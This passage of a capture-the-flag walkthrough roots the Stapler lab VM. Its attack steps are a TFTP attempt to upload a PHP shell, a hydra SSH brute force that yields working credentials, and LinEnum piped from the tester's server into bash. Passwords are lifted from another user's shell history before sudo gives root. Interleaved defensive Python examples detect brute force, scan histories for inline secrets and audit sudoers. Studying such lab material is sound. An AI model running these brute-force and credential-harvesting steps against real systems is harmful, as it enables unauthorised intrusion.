PORT   STATE         SERVICE VERSION
69/udp open|filtered tftp
MAC Address: 00:0C:29:BD:3B:EA (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.99 seconds

Nmap can’t tell whether the port is open or filtered, so I try it anyway.

root@redteam:~/stapler# tftp 192.168.50.136
tftp> status
Connected to 192.168.50.136.
Mode: netascii Verbose: off Tracing: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds

Cool. Let’s see if we can upload a file.

tftp> verbose on
Verbose mode on.
tftp> mode
Using netascii mode to transfer files.
tftp> put shell.php
putting shell.php to 192.168.50.136:shell.php [netascii]
Sent 5688 bytes in 0.0 seconds [inf bits/sec]

Unfortunately the uploaded script wasn’t anywhere to be found.

SSH

I really don’t like brute forcing, mostly because it can take a very long time and it is very noisy.
But in this case I give it a shot.

root@redteam:~/stapler# hydra -L rid.list -P rid.list 192.168.50.136 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-31 11:38:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 841 login tries (l:29/p:29), ~53 tries per task
[DATA] attacking ssh://192.168.50.136:22/
[22][ssh] host: 192.168.50.136   login: SHayslett   password: SHayslett

And this is why I don’t like brute forcing. Before I found these credentials I had tried several lists from SecLists and then the rockyou list.
When that didn’t work I almost gave up on this option, and only as a last attempt did I use the usernames found during this pentest, which was more luck than wisdom.
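
The noise the author mentions is exactly what makes this step easy to detect on the target: hydra's 16 parallel tasks produce a burst of sshd failures for many different usernames from one source, followed by one success. The Python below is an added example, not part of the original write-up, showing that detection over a constructed auth.log excerpt. It parses the standard sshd "Failed password" / "Accepted ..." lines, keeps a sliding window per source address, and raises one alert when a source crosses a failure or distinct-user threshold and another when a login from that source then succeeds. Timestamps and process ids in the sample are made up; the hostname and addresses are those from the write-up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt: a burst of failures for many usernames from one
# source followed by a success, plus one unrelated failed login from another host.
SAMPLE_AUTH_LOG = """\
May 31 11:38:42 red sshd[2101]: Failed password for RNunemaker from 192.168.50.135 port 50112 ssh2
May 31 11:38:42 red sshd[2103]: Failed password for ETollefson from 192.168.50.135 port 50114 ssh2
May 31 11:38:43 red sshd[2105]: Failed password for DSwanger from 192.168.50.135 port 50116 ssh2
May 31 11:38:43 red sshd[2107]: Failed password for AParnell from 192.168.50.135 port 50118 ssh2
May 31 11:38:44 red sshd[2109]: Failed password for invalid user admin from 192.168.50.135 port 50120 ssh2
May 31 11:38:44 red sshd[2111]: Failed password for MBassin from 192.168.50.135 port 50122 ssh2
May 31 11:38:45 red sshd[2113]: Accepted password for SHayslett from 192.168.50.135 port 50124 ssh2
May 31 11:40:10 red sshd[2150]: Failed password for peter from 192.168.50.20 port 40000 ssh2
May 31 11:52:30 red sshd[2190]: Accepted publickey for peter from 192.168.50.20 port 40002 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line: str, year: int):
    """Return the event fields for an sshd auth line, or None for anything else."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # syslog timestamps carry no year, so the caller supplies it.
    ev["ts"] = datetime.strptime(f"{year} {ev['ts']}", "%Y %b %d %H:%M:%S")
    return ev


def detect_bruteforce(log_text: str, year: int = 2019, window: timedelta = timedelta(seconds=60),
                      max_failures: int = 5, max_users: int = 3) -> list:
    """Flag a source once it accumulates max_failures failures, or failures for
    max_users distinct accounts, inside the window; then flag any success from
    a flagged source while failures are still inside the window."""
    recent = defaultdict(list)   # ip -> [(timestamp, user), ...] inside the window
    flagged = set()
    alerts = []
    for ev in filter(None, (parse_line(l, year) for l in log_text.splitlines())):
        ip, ts = ev["ip"], ev["ts"]
        recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window]
        if ev["result"] == "Failed":
            recent[ip].append((ts, ev["user"]))
            users = {u for _, u in recent[ip]}
            if ip not in flagged and (len(recent[ip]) >= max_failures or len(users) >= max_users):
                flagged.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip, "at": ts,
                               "failures": len(recent[ip]), "users": sorted(users)})
        elif ip in flagged and recent[ip]:
            alerts.append({"type": "success-after-bruteforce", "ip": ip, "at": ts,
                           "user": ev["user"], "method": ev["method"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert type is the one worth paging on: a success preceded by a burst from the same source is the signature of a guessed password. On the server side, hydra's own warning about parallel tasks refers to sshd's `MaxStartups` throttle, and `MaxAuthTries` plus a log-driven blocker such as fail2ban turn this same signal into a mitigation.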

EoP

SHayslett@red:~$ ls -lah /home
total 128K
drwxr-xr-x 32 root       root       4.0K Jun  4  2016 .
drwxr-xr-x 22 root       root       4.0K Jun  7  2016 ..
drwxr-xr-x  2 AParnell   AParnell   4.0K Jun  5  2016 AParnell
drwxr-xr-x  2 CCeaser    CCeaser    4.0K Jun  5  2016 CCeaser
drwxr-xr-x  2 CJoo       CJoo       4.0K Jun  5  2016 CJoo
drwxr-xr-x  2 Drew       Drew       4.0K Jun  5  2016 Drew
drwxr-xr-x  2 DSwanger   DSwanger   4.0K Jun  5  2016 DSwanger
drwxr-xr-x  2 Eeth       Eeth       4.0K Jun  5  2016 Eeth
drwxr-xr-x  2 elly       elly       4.0K Jun  5  2016 elly
drwxr-xr-x  2 ETollefson ETollefson 4.0K Jun  5  2016 ETollefson
drwxr-xr-x  2 IChadwick  IChadwick  4.0K Jun  5  2016 IChadwick
drwxr-xr-x  2 jamie      jamie      4.0K Jun  5  2016 jamie
drwxr-xr-x  2 JBare      JBare      4.0K Jun  5  2016 JBare
drwxr-xr-x  2 jess       jess       4.0K Jun  5  2016 jess
drwxr-xr-x  2 JKanode    JKanode    4.0K Jun  5  2016 JKanode
drwxr-xr-x  2 JLipps     JLipps     4.0K Jun  5  2016 JLipps
drwxr-xr-x  2 kai        kai        4.0K Jun  5  2016 kai
drwxr-xr-x  2 LSolum     LSolum     4.0K Jun  5  2016 LSolum
drwxr-xr-x  2 LSolum2    LSolum2    4.0K Jun  5  2016 LSolum2
drwxr-xr-x  2 MBassin    MBassin    4.0K Jun  5  2016 MBassin
drwxr-xr-x  2 mel        mel        4.0K Jun  5  2016 mel
drwxr-xr-x  2 MFrei      MFrei      4.0K Jun  5  2016 MFrei
drwxr-xr-x  2 NATHAN     NATHAN     4.0K Jun  5  2016 NATHAN
drwxr-xr-x  3 peter      peter      4.0K Jun  3  2016 peter
drwxr-xr-x  2 RNunemaker RNunemaker 4.0K Jun  5  2016 RNunemaker
drwxr-xr-x  2 Sam        Sam        4.0K Jun  5  2016 Sam
drwxr-xr-x  2 SHAY       SHAY       4.0K Jun  5  2016 SHAY
drwxr-xr-x  3 SHayslett  SHayslett  4.0K May 31 10:39 SHayslett
drwxr-xr-x  2 SStroud    SStroud    4.0K Jun  5  2016 SStroud
drwxr-xr-x  2 Taylor     Taylor     4.0K Jun  5  2016 Taylor
drwxrwxrwx  2 www        www        4.0K Jun  5  2016 www
drwxr-xr-x  2 zoe        zoe        4.0K Jun  5  2016 zoe

Let’s start with some basic enumeration.
I start a Python HTTP server on port 80 in the folder containing a recon bash script (LinEnum).

root@redteam:/opt/tools/shells/LinEnum# server 80
Serving HTTP on 0.0.0.0 port 80 ...

Then I fetch it with curl on the remote system and pipe it into bash.
This way the script runs on the remote system without transferring the file first.

...[SNIP]...

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

...[SNIP]...

[-] Accounts that have recently used sudo:
/home/peter/.sudo_as_admin_successful

...[SNIP]...

/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit

It looks like Peter is the user of interest, and JKanode’s bash history contains Peter’s password (as well as JKanode’s own).
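
Passwords passed on the command line, as with `sshpass -p`, end up in shell history and in the process list, which is how this step of the write-up works at all. The Python below is an added example, not part of the original write-up: a small scanner a defender can run over `.bash_history` files to find such inline credentials, reporting the line and the affected account with the secret redacted. Its input is a constructed copy of the JKanode history shown above; the patterns cover the common offenders (`sshpass -p`, `mysql -p`, `--password=`, `*PASSWORD=` assignments, `curl -u`).

```python
import re

# Constructed copy of the JKanode history shown above, used as the scanner's input.
SAMPLE_HISTORY = """\
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
"""

# Each pattern captures the secret in the group named "secret" so it can be redacted.
PATTERNS = [
    ("sshpass", re.compile(r"\bsshpass\s+-p\s*(?P<secret>\S+)")),
    ("mysql", re.compile(r"\bmysql\b.*\s-p(?P<secret>\S+)")),
    ("long-option", re.compile(r"--(?:password|passwd|token)[= ](?P<secret>\S+)")),
    ("env-assignment", re.compile(r"\b[A-Z_]*(?:PASS|PASSWORD|SECRET|TOKEN)[A-Z_]*=(?P<secret>\S+)")),
    ("curl-basic", re.compile(r"\bcurl\b.*\s(?:-u|--user)\s+(?P<secret>\S+:\S+)")),
]
# user@host, to report which account the leaked credential belongs to.
ACCOUNT = re.compile(r"(?P<user>[\w.-]+)@(?P<host>[\w.-]+)")


def scan_history(text: str) -> list:
    """Return one hit per history line that carries an inline credential.
    The secret itself is never returned; the line is reported redacted."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            secret = m.group("secret")
            account = ACCOUNT.search(line)
            hits.append({
                "line": lineno,
                "kind": kind,
                "account": account.group(0) if account else None,
                "redacted": line.replace(secret, "<redacted>"),
            })
            break   # one finding per line is enough
    return hits


if __name__ == "__main__":
    for hit in scan_history(SAMPLE_HISTORY):
        print(f"line {hit['line']:>3} [{hit['kind']}] {hit['account'] or '-'}: {hit['redacted']}")
```

Running this across /home/*/.bash_history (and root's) as part of a periodic audit catches the same finding LinEnum surfaced here, and the fix is procedural: key-based SSH, `sshpass -f` or an askpass helper instead of `-p`, and `HISTCONTROL=ignorespace` only as a last resort since it relies on the user remembering to use it.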

JKanode@red:~$ su peter
Password: 

This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- (
Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red% pwd
/home/JKanode
red% cd
red% pwd
/home/peter
red% ls -lah
total 72K
drwxr-xr-x  3 peter peter 4.0K Jun  3  2016 .
drwxr-xr-x 32 root  root  4.0K Jun  4  2016 ..
-rw-------  1 peter peter    1 Jun  5  2016 .bash_history
-rw-r--r--  1 peter peter  220 Jun  3  2016 .bash_logout
-rw-r--r--  1 peter peter 3.7K Jun  3  2016 .bashrc
drwx------  2 peter peter 4.0K Jun  6  2016 .cache
-rw-r--r--  1 peter peter  675 Jun  3  2016 .profile
-rw-r--r--  1 peter peter    0 Jun  3  2016 .sudo_as_admin_successful
-rw-------  1 peter peter  577 Jun  3  2016 .viminfo
-rw-rw-r--  1 peter peter  39K Jun  3  2016 .zcompdump
red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
red% 

Well….that’s nice.
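The `(ALL : ALL) ALL` line comes from Peter’s membership of the sudo group, which the default Ubuntu sudoers grants unrestricted root. Below is an added example, not code from the original post, of how an administrator can audit sudoers for exactly this: it parses the common `who host = (runas) [NOPASSWD:] commands` form, expands `%group` entries with a group map, and lists every principal who can effectively run anything as root. The sample sudoers text and the group map are constructed; aliases, `@include` directives and the full sudoers grammar are not resolved.

```python
"""Audit sudoers user specifications for root-equivalent grants.

Added example, not code from the original post. SAMPLE_SUDOERS and
SAMPLE_GROUPS below are constructed, modelled on the Ubuntu default that
produced the "(ALL : ALL) ALL" line in peter's sudo -l output above.
"""
import re

# who host = (runas) [TAG: ...] commands   -- the common user-spec form.
# Aliases, Defaults and include directives are skipped, not resolved, and
# a '#' anywhere is treated as a comment (so #include lines are dropped too).
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def iter_rules(text):
    """Yield (who, host, runas, tags, cmds) for each user specification."""
    logical = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()      # drop comments
        if line.endswith("\\"):                    # join continuation lines
            logical += line[:-1] + " "
            continue
        stmt, logical = (logical + line).strip(), ""
        if not stmt or stmt.startswith(SKIP):
            continue
        m = RULE.match(stmt)
        if not m:
            continue
        tags = set(re.findall(r"[A-Z]+", m["tags"]))
        cmds = [c.strip() for c in m["cmds"].split(",")]
        yield m["who"], m["host"], m["runas"], tags, cmds


def runas_covers_root(runas):
    """True if the rule's run-as user list lets the command run as root."""
    if runas is None:
        return True                        # sudoers default run-as is root
    users = runas.split(":")[0]            # "users : groups" -> users part
    return any(u.strip() in ("ALL", "root") for u in users.split(","))


def root_equivalent_users(text, groups):
    """Return {principal: rule} for everyone who may run ALL commands as root.
    %group entries are expanded with the supplied {group: [members]} map."""
    result = {}
    for who, host, runas, tags, cmds in iter_rules(text):
        if "ALL" not in cmds or not runas_covers_root(runas):
            continue
        nopass = "NOPASSWD: " if "NOPASSWD" in tags else ""
        rule = f"{who} {host}=({runas or 'root'}) {nopass}{', '.join(cmds)}"
        members = groups.get(who[1:], []) if who.startswith("%") else [who]
        for member in members:
            result.setdefault(member, rule)
    return result


def nopasswd_rules(text):
    """List (who, commands) for rules that need no password at all."""
    return [(who, cmds) for who, _, _, tags, cmds in iter_rules(text) if "NOPASSWD" in tags]


SAMPLE_SUDOERS = """\
# Constructed sudoers, modelled on the Ubuntu default.
Defaults\tenv_reset
Defaults\tsecure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# User privilege specification
root\tALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo\tALL=(ALL:ALL) ALL

www-data ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2, \\
    /usr/bin/systemctl status apache2
backup ALL=(backup) ALL

#includedir /etc/sudoers.d
"""
# Constructed group map; on the box above, peter is in the sudo group.
SAMPLE_GROUPS = {"admin": [], "sudo": ["peter"], "lxd": ["peter"]}

if __name__ == "__main__":
    for user, rule in root_equivalent_users(SAMPLE_SUDOERS, SAMPLE_GROUPS).items():
        print(f"root-equivalent: {user:10} via  {rule}")
    for who, cmds in nopasswd_rules(SAMPLE_SUDOERS):
        print(f"NOPASSWD:        {who:10} ->   {', '.join(cmds)}")
```

On a real host the group map comes from `getent group` (or the `grp` module), and `/etc/sudoers.d/*` must be scanned as well, since the include directive is skipped here. The point of the expansion is the one this box makes: the dangerous grant is rarely a line that names the user, it is a group membership (here `sudo`) combined with a password that leaked elsewhere.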

red% sudo -i
➜  ~ pwd
/root
➜  ~ id
uid=0(root) gid=0(root) groups=0(root)
➜  ~ ls -lah
total 208K
drwx------  4 root root 4.0K May 31 11:19 .
drwxr-xr-x 22 root root 4.0K Jun  7  2016 ..
-rw-------  1 root root    1 Jun  5  2016 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rwxr-xr-x  1 root root 1.1K Jun  5  2016 fix-wordpress.sh
-rw-r--r--  1 root root  463 Jun  5  2016 flag.txt
-rw-r--r--  1 root root  345 Jun  5  2016 issue
-rw-r--r--  1 root root   50 Jun  3  2016 .my.cnf
-rw-------  1 root root    1 Jun  5  2016 .mysql_history
drwxr-xr-x 11 root root 4.0K Jun  3  2016 .oh-my-zsh
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwxr-xr-x  1 root root  103 Jun  5  2016 python.sh
-rw-------  1 root root 1.0K Jun  5  2016 .rnd
drwxr-xr-x  2 root root 4.0K Jun  4  2016 .vim
-rw-------  1 root root    1 Jun  5  2016 .viminfo
-rw-r--r--  1 root root  54K Jun  5  2016 wordpress.sql
-rw-r--r--  1 root root  39K Jun  3  2016 .zcompdump
-rw-r--r--  1 root root  39K Jun  3  2016 .zcompdump-red-5.1.1
-rw-------  1 root root   39 Jun  5  2016 .zsh_history
-rw-r--r--  1 root root 2.8K Jun  3  2016 .zshrc
-rw-r--r--  1 root root   17 Jun  3  2016 .zsh-update
➜  ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

And that’s the flag.

Conclusion

This was definitely good practice for working your way through a system step by step.
Given the many possible ways into this machine, I found it odd that so many rabbit holes turned out to be nothing and that in the end a simple SSH brute force did the trick.

To compare notes I read a few walkthroughs by others who did the same challenge, and some had different outcomes, with WordPress for example.
For me, uploading the plugin was no problem and there was no mention of FTP credentials.

Anyhow….I really liked this challenge and I would recommend it to anyone who is trying to learn more about pentesting.
